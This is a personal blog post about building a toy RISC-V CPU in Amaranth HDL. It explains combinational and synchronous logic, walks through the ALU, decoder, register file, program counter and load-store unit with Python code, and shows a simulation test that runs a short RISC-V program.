Hardware is designed with special programming languages, called hardware description languages (HDL). The most common ones are Verilog and VHDL. For my project I decided to use Amaranth HDL, because it’s higher level and easier to use — plus it’s written in my favorite language Python. Simplified, it enables an engineer to write a Python program that generates a hardware description, instead of describing it directly in Verilog or VHDL. A nice property of Amaranth HDL is that by design the resulting programs are synthesizable, i.e. they can be “compiled” into a description executable in FPGAs or built as an ASIC.

A key difference between software and hardware is concurrency: In software code is executed line by line, in order and we need special constructs like threads to achieve parallelism. In hardware it’s different: Everything is happening at the same time. We are not describing high-level operations, but rather how logic gates are connected to each other.

Combinational logic 

There are two key concepts in hardware: combinational logic (sometimes also called combinatorial logic) and synchronous logic. Simplified, combinational logic executes all the time and everything at the same time. In the following example green are input signals, yellow are internal signals (output of one piece of logic and input to the next), blue is logic and orange is the final output signal:

Combinational logic always updates its output immediately when any input changes. There are a couple of physical limitations here, but we’ll simplify this for now. This means changing any input signal will immediately change the output signal sum.

In Amaranth we can implement this as

# to run tests: python3 -m pytest add3.py

import pytest

from amaranth import Signal, Module, Elaboratable, ClockDomain
from amaranth.build import Platform
from amaranth.sim import Simulator, Settle, Tick


class Add3Comb(Elaboratable):
    def __init__(self):
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # technically this is not needed: a second `+` below would do
        #     but let's build the circuit exactly as shown above
        temp_sum = Signal(32)

        # define how our logic works
        m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
        m.d.comb += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3comb():
    # set up our device under test
    dut = Add3Comb()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # check that the sum is the expected value
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.run()

The key takeaway here is that the lines

 m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
 m.d.comb += self.result.eq(self.count_3 + temp_sum)

are executed at the same time and also whenever the inputs change.

Synchronous Logic 

There’s a second kind of commonly used logic: synchronous logic. The difference to combinational logic is that outputs only change on a clock edge. I.e. when the clock signal goes from low to high (positive edge) or vice versa (negative edge). Let’s use the adder example again. Colors as before, but we’ll use turquoise for synchronous logic.

We use positive edge triggered logic here. So unless the clock goes from low to high, both temp_sum and result will never change. The following overview shows how the values change; let’s furthermore assume the logic was just reset, so outputs start at 0.

  • after reset: temp_sum = 0, result = 0
  • after the first positive edge: temp_sum = 21, result = 21 (count_3 plus the old temp_sum of 0)
  • after the second positive edge: temp_sum = 21, result = 42

The circuit takes on the expected value only after two full clock cycles. Even if the input signals are not defined in the time period between one positive edge and the next, this will not change the output in any way.

Physically things are more complex (“delta time”) and this results in interesting tradeoffs between the length of combinational logic paths (number of gates, circuit length) and the attainable clock speed. Luckily this does not matter for my toy CPU.

In Amaranth we can implement this as

class Add3Sync(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        temp_sum = Signal(32)

        # define how our logic works
        m.d.sync += temp_sum.eq(self.count_1 + self.count_2)
        m.d.sync += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3sync():
    # set up our device under test
    dut = Add3Sync()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # no positive edge yet, so still at reset value
        assert (yield dut.result) == 0

        # trigger a positive edge on the clock and wait for things to settle down
        yield Tick()
        yield Settle()

        # count3 is reflected in the output, since temp sum is still zero
        assert (yield dut.result) == 21

        yield Tick()
        yield Settle()

        # now both count3 and temp sum will be reflected in the output
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.add_clock(1e-6)
    sim.run()

CPU design 

Armed with this knowledge I figured out which things needed to happen in parallel and which things in sequence.

So if we have an ALU related instruction it would work like this:

  1. in parallel
    • read instruction from ROM at the instruction address,
    • decode the instruction,
    • read register values and if present immediate value,
    • compute the result in the ALU,
    • assign ALU result to destination register (not yet visible!)
    • increment instruction address by 4 bytes (not yet visible!)
  2. wait for positive clock edge, giving step 1 time to settle, and in the following instant
    • update instruction address, making the new value visible
    • update destination register value, making the new value visible
  3. repeat, starting at 1.

Iteratively creating diagrams of how things should work was immensely helpful. Below is a simplified version of my CPU design, though it lacks many of the control signals and special cases for operations related to jumping and branching. Please view in full screen mode, where you can also toggle ALU or LSU layers to make it easier to read. Colors here are just to help with readability of the diagram.

Now let’s talk about the CPU components in detail. Designing them reminded me a lot about functional programming, where the parameters of a function and types naturally guide the implementation. All necessary details about the RISC-V instruction set are specified in detail in the spec.

ALU 

Compute data1 $OPERATION data2. I decided to merge the branch unit into the ALU, so there’s a branch for is_branch.

class ALU(Elaboratable):
    def __init__(self):
        # if set to 0, then normal ALU operation,
        #     otherwise treat funct3 as branch condition operator
        self.i_is_branch = Signal(1)

        # operation, e.g. "add" or "xor", from decoder
        self.i_funct3 = Signal(3)

        # sub-operation, e.g. "sub" for "add", from decoder
        self.i_funct7 = Signal(7)

        # value of register 1
        self.i_data1 = SignedSignal(32)

        # value of register 2 or immediate
        self.i_data2 = SignedSignal(32)

        # computation result
        self.o_result = SignedSignal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # this ALU also implements branch logic
        with m.If(self.i_is_branch == 0):
            # normal ALU
            with m.Switch(self.i_funct3):
                with m.Case(FUNCT3_OP_XOR):
                    m.d.comb += self.o_result.eq(self.i_data1 ^ self.i_data2)
                with m.Case(FUNCT3_OP_SLL):
                    shift_amount = self.i_data2[0:5]
                    m.d.comb += self.o_result.eq(
                        self.i_data1.as_unsigned() << shift_amount)
                # ...

In this snippet you can see how Amaranth is really a code generator: instead of using the normal switch and if statements, which control Python flow, you have to use the m.Switch etc. methods on the module.

Decoder 

Provide all necessary signals to control execution.

class InstructionDecoder(Elaboratable):
    def __init__(self):
        self.i_instruction = Signal(32)
        self.i_instruction_address = Signal(32)

        # select signals for register file
        self.o_rs1 = Signal(5)
        self.o_rs2 = Signal(5)
        self.o_rd = Signal(5)
        self.o_rd_we = Signal(1)

        # ALU / LSU operations
        self.o_funct3 = Signal(3)
        self.o_funct7 = Signal(7)

        # immediate value
        self.o_imm = SignedSignal(32)

        # control signals
        self.o_invalid = Signal(1)
        self.o_has_imm = Signal(1)
        self.o_is_branch = Signal(1)
        self.o_is_memory = Signal(2)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        m.d.comb += self.o_invalid.eq(0)
        m.d.comb += self.o_is_branch.eq(0)

        opcode = self.i_instruction[0:7]

        with m.Switch(opcode):
            with m.Case(OPCODE_OP_IMM):
                # rd = rs1 $OP imm
                # use ALU with immediate
                m.d.comb += [
                    self.o_rd.eq(self.i_instruction[7:12]),
                    self.o_rd_we.eq(1),
                    self.o_funct3.eq(self.i_instruction[12:15]),
                    self.o_rs1.eq(self.i_instruction[15:20]),
                    self.o_rs2.eq(0),
                    self.o_imm.eq(self.i_instruction[20:32]),
                    self.o_has_imm.eq(1),
                    self.o_funct7.eq(0),
                ]
            # ...

Register File 

Implement 32 registers. Special case: register x0 is hard-wired to zero, by not allowing writes to it.

I’m not sure if this is the best implementation, but it works well in simulation so far.

class RegisterFile(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        self.i_select_rs1 = Signal(5)
        self.i_select_rs2 = Signal(5)
        self.i_select_rd = Signal(5)

        self.i_we = Signal(1)
        self.i_data = SignedSignal(32)

        self.o_rs1_value = SignedSignal(32)
        self.o_rs2_value = SignedSignal(32)

        self.registers = Signal(32 * 32)

        self.ports = [self.sync, self.i_select_rs1, self.i_select_rs2, self.i_select_rd, self.i_data, self.i_we]

    def elaborate(self, _: Platform) -> Module:
        """
        on clock edge if i_we is set: stores i_data at reg[i_select_rd]
        combinationally returns register values
        """

        m = Module()

        m.d.comb += [
            self.o_rs1_value.eq(self.registers.word_select(self.i_select_rs1, 32)),
            self.o_rs2_value.eq(self.registers.word_select(self.i_select_rs2, 32)),
        ]

        with m.If((self.i_we == 1) & (self.i_select_rd != 0)):
            m.d.sync += self.registers.word_select(self.i_select_rd, 32).eq(self.i_data)

        return m

Program Counter 

The simplest component: we start executing programs at 0x1000 and then go to the next instruction. The decoder computes offset based on the instruction to allow both absolute and relative jumps.

class ProgramCounter(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")
        self.i_offset = SignedSignal(32)
        self.o_instruction_address = Signal(32, reset=0x1000)

        self.ports = [self.o_instruction_address]

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        m.d.sync += self.o_instruction_address.eq(self.o_instruction_address + self.i_offset)

        return m

Load Store Unit 

I’m co-simulating this part, so there is no implementation. Also, simulating even small amounts of memory turned out to be way too slow. I hope to find more time in the future to complete this part of the project. And then also run it with real memory on an FPGA instead of just in simulation.

But let’s at least discuss the most interesting aspect of memory: memory is usually very slow compared to the CPU. So the CPU has to be stalled, i.e. wait, while the memory executes the read or write. In my design I have defined an o_done signal. This signal tells the control unit not to advance the program counter until the result is available. Not sure if this is the best approach, but it works for now.

class LoadStoreUnit(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        # from decoder, not in spec, internal control signals
        self.i_lsu_mode = Signal(2)

        # from decoder, memory operation
        self.i_funct3 = Signal(3)

        # address
        self.i_address_base = Signal(32)
        self.i_address_offset = SignedSignal(12)

        # reading / writing
        self.i_data = Signal(32)
        self.o_data = Signal(32)

        # signals that the memory operation has completed
        self.o_done = Signal(1)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # empty by design: this is co-simulated

        return m

Tieing it all together and testing it 

The control unit connects all modules, as described in the simplified diagram above, and uses the control logic from the decoder to correctly advance the program counter.

Instead of showing the boring glue code, here’s how I’m testing the CPU via simulation. The assembly program is designed to set registers to certain values, that can be checked afterwards. It does not follow any ABI constraints.

def test_cpu():
    dut = CPU()
    sim = Simulator(dut)

    rom = [
        0x02A00093,  # addi x1 x0 42   --> x1 = 42
        0x00100133,  # add x2 x0 x1    --> x2 = 42
        0x123451B7,  # lui x3 0x12345  --> x3 = 0x12345
        0x00208463,  # beq x1 x2 8     --> skip the next instruction
        0x00700193,  # addi x3 x0 7    [skipped]
        0x00424233,  # xor x4 x4 x4    --> x4 = 0
        0x00A00293,  # addi x5 x0 10   --> x5 = 10
        0x00120213,  # addi x4 x4 1    --> x4 = x4 + 1
        0x00520463,  # beq x4 x5 8     --> skip the next instruction
        0xFF9FF36F,  # jal x6 -8       --> jump up; effectively setting x4 = 10
                     #                     also setting x6 = pc + 4
        0x000013B7,  # lui x7 0x1      --> x7 = 0x1000
        0x03438467,  # jalr x8 x7 52   --> skip the next instruction
        0x00634333,  # xor x6 x6 x6    [skipped]
        0x100004B7,  # lui x9 0x10000  --> x9 = 0x1000_0000
        0x0324A503,  # lw x10 50 x9    --> x10 = *((int32*)(mem_u8_ptr[x9 + 0x32]))
        0x00000013,  # nop
        0,
    ]

    ram = [0 for x in range(128)]
    ram[0x32 + 3], ram[0x32 + 2], ram[0x32 + 1], ram[0x32] = 0xC0, 0xFF, 0xEE, 0x42

    done = [0]

    def bench():
        assert (yield dut.o_tmp_pc) == 0x1000

        while True:
            instr_addr = yield dut.o_tmp_pc
            print("instr addr: ", hex(instr_addr))
            rom_addr = (instr_addr - 0x1000) // 4

            if rom[rom_addr] == 0:
                done[0] = 1
                print("bench: done.")
                break

            print("instr: ", hex(rom[rom_addr]))

            yield dut.i_tmp_instruction.eq(rom[rom_addr])
            yield Settle()

            assert (yield dut.decoder.o_invalid) == False

            yield Tick()
            yield Settle()

        read_reg = lambda x: dut.registers.registers.word_select(x, 32)

        assert (yield read_reg(1)) == 42
        assert (yield read_reg(2)) == 42
        assert (yield read_reg(3)) == 0x12345000
        assert (yield read_reg(5)) == 10
        assert (yield read_reg(4)) == 10
        assert (yield read_reg(6)) == 0x1000 + 4 * rom.index(0xFF9FF36F) + 4
        assert (yield read_reg(7)) == 0x1000
        assert (yield read_reg(8)) == 0x1000 + 4 * rom.index(0x03438467) + 4
        assert (yield read_reg(9)) == 0x1000_0000
        assert (yield read_reg(10)) == 0xC0FFEE42

        yield Passive()

    def memory_cosim():
        lsu = dut.lsu

        was_busy = False

        while not done[0]:
            lsu_mode = yield lsu.i_lsu_mode
            if lsu_mode == INTERNAL_LSU_MODE_DISABLED:
                was_busy = False
                yield lsu.o_data.eq(0)
                yield lsu.o_done.eq(0)
            elif lsu_mode == INTERNAL_LSU_MODE_LOAD and was_busy is False:
                was_busy = True
                base = yield lsu.i_address_base
                offset = yield lsu.i_address_offset
                addr = base + offset
                funct3 = yield lsu.i_funct3
                print(f"memory read request: addr={hex(addr)}")

                yield Tick()  # a read takes a while
                yield Tick()
                yield Tick()

                ram_offset = addr - 0x10000000
                if funct3 == FUNCT3_LOAD_W:
                    value = (ram[ram_offset + 3] << 24) | (ram[ram_offset + 2] << 16) | (ram[ram_offset + 1] << 8) | ram[ram_offset]
                # ...

                yield lsu.o_data.eq(value)
                yield lsu.o_done.eq(1)
            # ...

            yield Tick()
        print("memory_cosim: done.")

        yield Passive()

    sim.add_clock(1e-6)
    sim.add_process(bench)
    sim.add_process(memory_cosim)
    sim.run()

Conclusion 

My development time ran out before I completed the project, so no game of life on my toy CPU for now. So what’s missing?

  • memory mapped I/O, so that instead of keeping the LEDs in memory, signals / pins of the CPU are used,
  • adding support for a few missing read / write operations to the memory controller (read byte, write byte),
  • integrating the emulator and simulator, re-using the existing debugger user interface,
  • and then likely spending some time on debugging,
  • maybe porting the simulator to Verilator or another framework to make it fast enough.

But I thought having a blog post is much better than completing this experiment now. I hope to find time in the future to again work on this, finally run game of life on my CPU and actually run it in an FPGA. That would be fun.

But the best part is really: I’ve learned so much as you’ve read. Try it yourself. Thank you for reading 🙂

Full source code 

You can find my source code at https://github.com/fnoeding/fpga-experiments . It’s not as clean as the snippets above, but I hope it provides additional context if you’d like to dive deeper.

Additional Material 

If you want to learn more I’ve collected some links that helped me below: